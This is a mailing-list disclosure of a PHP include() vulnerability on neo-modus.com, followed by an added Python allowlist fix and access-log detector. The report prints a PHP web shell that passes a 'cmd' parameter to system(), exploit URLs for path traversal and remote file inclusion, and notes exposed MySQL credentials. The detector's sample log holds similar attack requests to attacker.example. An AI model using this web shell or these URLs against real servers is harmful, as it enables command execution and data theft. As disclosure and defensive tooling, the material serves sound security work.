Message-ID: <18636.1033538486@www47.gmx.net>
From: burpz at gmx.net (burpz@....net)
Subject: PHP execution vulnerability on www.neo-modus.com (direct connect homepage)

> neo-modus.com is the home of the quite popular file sharing utility
> 'direct connect', unfortunately their website is vulnerable to a common
> php include() vulnerability. Message below was sent 2 weeks ago to the
> 'bugs' email address listed on their website. I didn't get any response.
> 
> --- Forwarded Message ---
> > Dear Reader,
> > 
> > I recently stumbled across your website www.neo-modus.com, I fiddled
> > around a bit with the .php scripts, and found that they are vulnerable
> > to a very common php error.
> > 
> > The index.php script takes a parameter 'page', so it knows what page to
> > show. It then passes the value of this parameter DIRECTLY into an
> > include() statement. This is very, very bad. Let's say I go to the url:
> > http://www.neo-modus.com/?page=/etc/passwd - this tries to open
> > /etc/passwd.html - so I can break out of the document root and view
> > every file with an .html (or .php?) extension. This seems not too bad,
> > but there's more. PHP has a feature called "furl_open", which allows
> > include() to take a URL as a parameter to include it in its page. So we
> > create a text file on a different webserver (which doesn't parse .txt
> > files) called test.txt, which contains:
> > 
> > <?php
> >   printf("<div align=\"left\"><pre>");
> >   printf("%s", nl2br(system($HTTP_GET_VARS['cmd'])));
> >   printf("</pre></div>");
> > ?>
> > 
> > we then go to the url
> > http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al
> > 
> > and we get a nice "ls -al" output run on YOUR webserver. We can run all
> > commands with privileges of the webserver. I think you can understand
> > how bad this is.
> > 
> > To fix these issues, I suggest you disable furl_open in the php
> > configuration file, and filter the "page" parameter passed to index.php
> > so that it strips slashes, backslashes, dots and limits it to a specific
> > directory only.
> > 
> > Another thing: don't place files which contain password information in
> > the document root. ConnectToDatabase.php contains sensitive information.
> > Change your mysql passwords, and limit access to the mysql server from
> > YOUR website host only. I could connect without problems - this should
> > not be the case.
> > 

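Added example, not part of the original post and not neo-modus.com's code: the `page` parameter handling the forwarded message describes, modelled in Python so the checks run offline. The first part puts the described include() argument (raw value plus ".html") next to an allowlist resolver that makes the parameter select a key rather than a path, so "../", absolute paths and URL schemes never reach include(). The second part is a detector run over constructed access-log lines that flags `page=` values carrying a URL scheme or escaping the page directory, which is what a site operator would look for in their logs after a report like this. The page directory, the allowlist, the log lines and the host `attacker.example` are all assumptions made for this example.

```python
"""Page-parameter validation and log detection for the include() pattern described above.

Added example (not from the original post). PAGE_DIR, ALLOWED_PAGES, SAMPLE_LOG and the
host attacker.example are constructed for this example.
"""
from __future__ import annotations

import posixpath
import re
from urllib.parse import parse_qs, urlsplit

PAGE_DIR = "/var/www/html/pages"                     # assumed location of page fragments
ALLOWED_PAGES = {"home", "download", "news", "faq"}  # assumed allowlist of page keys


def resolve_page_unsafe(page: str) -> str:
    """The behaviour the post describes: the raw parameter plus '.html' goes to include().

    '/etc/passwd' becomes '/etc/passwd.html' and 'http://host/test.txt' keeps its scheme,
    so the argument may point outside the document root or at a remote server.
    """
    return page + ".html"


def resolve_page_safe(page: str | None, default: str = "home") -> str:
    """Allowlist resolver: the request selects a key, the key selects a file.

    Anything not in ALLOWED_PAGES falls back to the default page, so no user-supplied
    path fragment is ever concatenated into the include() argument.
    """
    key = page if page in ALLOWED_PAGES else default
    return posixpath.join(PAGE_DIR, key + ".html")


SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)


def is_local_page_path(candidate: str) -> bool:
    """Defence-in-depth check for a resolved path: no URL scheme, and still under PAGE_DIR
    after normalisation (posixpath.join discards PAGE_DIR when candidate is absolute,
    which is exactly the '/etc/passwd.html' case from the post)."""
    if SCHEME.match(candidate):
        return False
    normalized = posixpath.normpath(posixpath.join(PAGE_DIR, candidate))
    return normalized.startswith(PAGE_DIR + "/")


# Request line of a common/combined access log: "GET /?page=news HTTP/1.0"
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_page_value(value: str) -> str | None:
    """Return a finding label for a decoded page= value, or None if it looks benign."""
    if SCHEME.match(value):
        return "remote-include"          # include() handed a URL (the test.txt scenario)
    if value.startswith("/") or ".." in value.split("/"):
        return "path-traversal"          # absolute path or dot-dot segment
    if value not in ALLOWED_PAGES:
        return "unknown-page"            # not in the allowlist; worth a look, lower priority
    return None


def find_inclusion_attempts(log_lines: list[str]) -> list[tuple[str, str]]:
    """Scan access-log lines and return (label, decoded page value) for suspicious requests.

    parse_qs percent-decodes the query, so '..%2F..%2Fetc%2Fpasswd' is caught as well.
    """
    findings: list[tuple[str, str]] = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get("page", []):
            label = classify_page_value(value)
            if label is not None:
                findings.append((label, value))
    return findings


# Constructed log lines in combined-log style (addresses from the documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Oct/2002:10:12:01 +0200] "GET /?page=news HTTP/1.0" 200 4120',
    '203.0.113.5 - - [02/Oct/2002:10:12:09 +0200] "GET /?page=/etc/passwd HTTP/1.0" 200 310',
    '203.0.113.5 - - [02/Oct/2002:10:12:31 +0200] "GET /?page=..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 310',
    '203.0.113.5 - - [02/Oct/2002:10:13:02 +0200] "GET /?page=http://attacker.example/test.txt&cmd=ls%20-al HTTP/1.0" 200 2210',
    '198.51.100.7 - - [02/Oct/2002:10:14:44 +0200] "GET /images/logo.gif HTTP/1.0" 200 9921',
]


if __name__ == "__main__":
    for label, value in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{label:16s} page={value!r} -> safe resolver would serve {resolve_page_safe(value)}")
```

The allowlist resolver is deliberately stricter than the "strip slashes, backslashes and dots" filter the message suggests: denylisting characters leaves room for encodings the filter did not anticipate, whereas a key lookup never lets request data form part of the path at all. Disabling remote URL handling for include() in the PHP configuration remains a separate, complementary step.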